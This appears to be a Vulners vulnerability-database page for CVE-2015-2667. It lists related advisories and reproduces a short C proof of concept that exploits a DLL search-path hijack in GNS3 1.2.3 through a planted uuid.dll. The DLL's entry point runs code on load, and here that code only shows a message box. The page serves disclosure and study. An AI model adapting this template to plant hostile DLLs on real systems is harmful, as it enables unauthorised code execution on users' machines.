| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| GNS3 Untrustworthy Search Path Vulnerability | 19 May 201500:00 | – | cnvd | |
| CVE-2015-2667 | 18 May 201515:00 | – | cve | |
| CVE-2015-2667 | 18 May 201515:00 | – | cvelist | |
| CVE-2015-2667 | 18 May 201515:00 | – | debiancve | |
| EUVD-2015-2759 | 7 Oct 202500:30 | – | euvd | |
| CVE-2015-2667 | 18 May 201515:59 | – | nvd | |
| Design/Logic Flaw | 18 May 201515:59 | – | prion | |
| SUSE CVE-2015-2667 | 23 May 202601:43 | – | susecve |
`/*
* Title: GNS3 1.2.3 DLL Hijacking Exploit (uuid.dll)
* Version: 2.0.1.7
* Tested on: Windows 8
* Vendor: http://www.gns3.com/
* Software-Link: http://downloads.gns3.com/GNS3-1.2.3-all-in-one.exe
* E-Mail: osanda[at]unseen.is
* Author: Osanda Malith Jayathissa
* Date: 01-05-2015
* /!\ Author is not responsible for any damage you cause
* Use this material for educational purposes only
* CVE: CVE-2015-2667
*/
#include <windows.h>
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH: owned();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int owned() {
MessageBox(0, "GNS3 1.2.3 DLL Hijacked\nOsanda", "POC", MB_OK);
}
/*EOF*/
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation